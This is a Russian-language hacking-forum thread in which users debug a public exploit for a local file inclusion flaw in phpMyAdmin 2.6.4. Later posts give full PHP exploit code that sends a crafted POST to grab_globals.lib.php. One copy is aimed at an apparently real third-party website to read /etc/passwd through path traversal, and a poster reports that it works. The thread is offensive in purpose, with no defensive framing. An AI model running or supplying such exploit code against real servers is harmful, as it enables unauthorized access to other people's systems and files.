Просмотр полной версии : Error in simple exploit phpMyAdmin
Здрасте!
Вот тут наткнулся на phpMyAdmin 2.6.1
Нашел сплойтик, для него
_http://securityvulns.ru/Jdocument894.html
Заюзал на локалхосте, но походу ручки то кривые.
Пишет.
ATTACK HOST IS: http://localhost
HTTP/1.1 400 Bad Request
Date: Tue, 11 Dec 2007 22:56:29 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.4
Content-Length: 226
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
</body></html>
Запросы делал вида
C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/fuck.php
Предварительно создав fuck.php
Я наверно непрально пишу файл инклуда.
Подскажите как будет верно?
попробуй просто localhost . или для fuck.php может быть нужен параметр, в котором инклуд.
попробуй просто localhost . или для fuck.php может быть нужен параметр, в котором инклуд.
ну если я прально понял, то просто localhost, не получится, а
fuck.php может быть нужен параметр, в котором инклуд
попробывал
C:\>perl\bin\perl.exe c:\php4.pl http://localhost /php/ www/htdocs/php/config.inc.php
тоже самое, наверно я непрально пишу путь к инклуду, пробывал
www/htdocs/php/config.inc.php
htdocs/php/config.inc.php
php/config.inc.php
config.inc.php
толка нет(
вобщем посмотрел я исходник, во первых убедись что phpmyadmin находится у тебя в папке php (не папка с phpmyadmin, а сам phpmyadmin)
во-вторых, имя файла который инклюдится (вернее там расчитано на то, что это читалка) должно иметь отнасительный путь, точно проверить не могу т.к. perl в денвере хреновый (без Sockets) сейчас попробую переделать под php если че отпишусь, если все получится
вобщем посмотрел я исходник, во первых убедись что phpmyadmin находится у тебя в папке php (не папка с phpmyadmin, а сам phpmyadmin)
во-вторых, имя файла который инклюдится (вернее там расчитано на то, что это читалка) должно иметь отнасительный путь, точно проверить не могу т.к. perl в денвере хреновый (без Sockets) сейчас попробую переделать под php если че отпишусь, если все получится
Спасибо огромное! Буду ждать. Что в папке php я уверен)
http://localhost/php/index.php
C:\www\htdocs\php
Может у меня криво настроенный апач? Оо
и по каким-то причинам ему не нравится POST?
Буду ждать. Что в папке php я уверен)
а в версии пхпмайадмина ты уверен?
а в версии пхпмайадмина ты уверен?
Да)
readme
Version 2.6.1-pl2
При входе
Добро пожаловать в phpMyAdmin 2.6.1-pl2
CHANGELOG
----------------------
phpMyAdmin - Changelog
----------------------
$Id: ChangeLog,v 2.871.2.24 2005/02/24 19:08:57 lem9 Exp $
$Source: /cvsroot/phpmyadmin/phpMyAdmin/ChangeLog,v $
2005-02-24 Marc Delisle <lem9@users.sourceforge.net>
### 2.6.1-pl2 released
2005-02-24 Alexander M. Turek <me@derrabus.de>
может дырка есть и в более старых версиях, а может и нет, я не знаю. но там указан 2.6.4
может дырка есть и в более старых версиях, а может и нет, я не знаю. но там указан 2.6.4
думаю, что да, например здесь
http://securityvulns.ru/source/PHPMYADMIN.html
версии 2.6 объединены
посмотрел я код grab_globals.lib.php нет там ничего, такого, что б могло позволять читать или инклюдить файлы (там вобще практически ничего нет)
вот код на пхп, помоему правильно:
<?php
$host="localhost";
$fl="../Credits";
$dira="/Tools/phpmyadmin/";
$filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1";
$leng=strlen($filo);
$qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n";
$qv=$qv.$filo;
$fp = fsockopen ($host, 80);
fputs ($fp, $qv);
while (!feof($fp))
{
echo fgets($fp);
}
?>
$host - хост
$fl - файл для инклюда
$dira - папка с phpmyadmin
но этот сплоит у меня ничего не делает, т.к. еще раз говорю в grab_globals.lib.php ничего такого нет...
у меня phpMyAdmin 2.6.1
да... все дело в версии например вот это работает:
<?php
$host="www.bafonline.net.nz";
$fl="../../../../../../../../../../etc/passwd";
$dira="/sql/";
$filo="usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$fl."&subform[1][cXIb8O3]=1";
$leng=strlen($filo);
$qv="POST ".$dira."libraries/grab_globals.lib.php HTTP/1.0\nHost:".$host."\nContent-Type:application/x-www-form-urlencoded\nContent-Length:".$leng."\n\n";
$qv=$qv.$filo;
echo $qv;
$fp = fsockopen ($host, 80);
fputs ($fp, $qv);
while (!feof($fp))
{
echo fgets($fp);
}
?>
уязвимы версии 2.6.4 и 2.6.4-pl1, 2.6.4-pl2 уже не уязвима,более ранние версии как выяснилось тоже не уязвимы
вобщем сплоит чисто инклюдит файлы, читать пхп файлы не получится, вобщем все прелести и недостатки локального инклюда... в $fl записывается имя файла с относительным путем, т.е. относительно libraries
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot